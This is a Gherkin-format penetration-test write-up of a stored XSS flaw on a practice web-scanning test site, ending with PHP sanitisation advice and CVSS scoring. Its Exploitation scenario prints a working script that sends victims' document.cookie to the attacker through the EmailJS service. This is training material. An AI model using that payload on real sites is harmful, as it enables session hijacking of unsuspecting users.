## Version 1.4.1
## language: en

Feature: Site review XSS
  TOE:
    Web Scanner Test Site
  Category:
    XSS
  Location:
    http://www.webscantest.com/crosstraining/reservation.php
  CWE:
    CWE-79: Improper Neutralization of Input During Web Page Generation
    ('Cross-site Scripting')
    https://cwe.mitre.org/data/definitions/79.html
    CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page
    (Basic XSS)
    https://cwe.mitre.org/data/definitions/80.html
  Rule:
    REQ.173: Discard unsafe inputs
    https://fluidattacks.com/web/rules/173/
  Goal:
    Get the cookie of any user.
  Recommendation:
    Sanitize and validate inputs.

  Background:
  Hacker's software:
    | <Software name> | <Version>     |
    | Windows         | 10            |
    | Google Chrome   | 80.0.3987.132 |
  TOE information:
    Given I am accessing the site http://www.webscantest.com/
    Then I can see there is a web page with challenges

  Scenario: Normal use case:
    Given I access http://www.webscantest.com/
    And I select a challenge
    Then I can try to hack it

  Scenario: Static detection:
    Given I can't access to the source code
    Then I can't perform a static detection

  Scenario: Dynamic detection
    Given http://webscantest.com/crosstraining/sitereviews.php
    And I see a form that ask me some information to make a review
    When I try to add some info to check how works each field
    Then I inspect the code to see the fields
    And I see that probably I can find a vulnerability
    When I see the field for name
    """
    <tr>
      <td><a href="mailto:<Email>"><Name></a></td>
    </tr>
    """
    Then I see that the field take the email in the form and is used to make a link
    And I think I probably can add an attribute to this link
    When I see the other fields I see that take the values and put in a column
    Then I those fields I try to inject any scripts
    When I make the script for each field [evidence](img1)
    Then I submit the form
    And I receive an alert with the message "Description"
    When I see that I can conclude that Description is vulnerable to XSS
    Then I move the mouse over the Name
    And I see an alert that says "Email"
    When I see that I can conclude that Email is vulnerable to XSS
    Then I try to change "onmouseover" to "onload" in Email
    And I see that "onload" don't work
    When I see that I can make XSS in Email and Description
    And I found a vulnerability

  Scenario: Exploitation
    Given The system is vulnerable to XSS injection
    And I want to get the cookie
    When I think that I can stole the cookie from the users
    Then I type a fake information in the fields
    And I added the following script in "Description" field
    """
    <script type="text/javascript" src=
      "https://cdn.jsdelivr.net/npm/emailjs-com@2.3.2/dist/email.min.js">
    </script>
    <script type="text/javascript">
      (function(){
        emailjs.init("user_2nFpwL4QDZ8x1xzY7GTXu");
      })();
    </script>
    <script type="text/javascript">
      var template_params = {
        "reply_to": "Hacker",
        "from_name": "Reservation",
        "to_name": "Hacker",
        "message_html": "<b>The cookie is: </b>"+(document.cookie)
      };
      var service_id = "default_service";
      var template_id = "template_nOBiPn2b";
      setTimeout(function(){
          emailjs.send(service_id, template_id, template_params);
        },300);
    </script>
    """
    And I only use the description field to the exploitation because
    """
    Use the Description field is enough to make that the explot works

    I didn't use in this case the field for Email because only works with
    'onmouseover', 'onmouseout' and 'onclick'.

    For that, I think that was more difficult to wait that a user moves the
    mouse over the name or click the name and in the case of 'onmouseout'
    each move activates the script and this can send a lot of emails.
    """
    When I submit the form I receive an email with my cookie [evidence](img2)
    Then I only need to wait until a user see the reservation history
    And I know that the user didn't notice that I stole the cookie
    When I finish to inject all
    And I exploit the vulnerability

  Scenario: Remediation
    Given I didn't have access to the source code
    And I can give a way to solve this vulnerability
    When I think a way to sanitize the field in php
    Then I can use the functions "htmlentities()" and "str_raplace()"
    """
    $data['email'] = str_replace('"', '&quot;', htmlentities($data['email']));
    $data['description'] = htmlentities($data['description']);
    """
    And The field can't execute scripts or scape to add an attribute
    And I think that this can fix the vulnerability

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    3.5/10 (Low) - AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N/
  Temporal: Attributes that measure the exploit's popularity and fixability
    3.4/10 (Low) - E:H/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    4.0/10 (Medium) - MAV:N/MAC:L/MPR:L/MUI:R/MS:U/MC:L/MI:N/MA:N

  Scenario: Correlations
    No correlations have been found to this date 2020-04-20
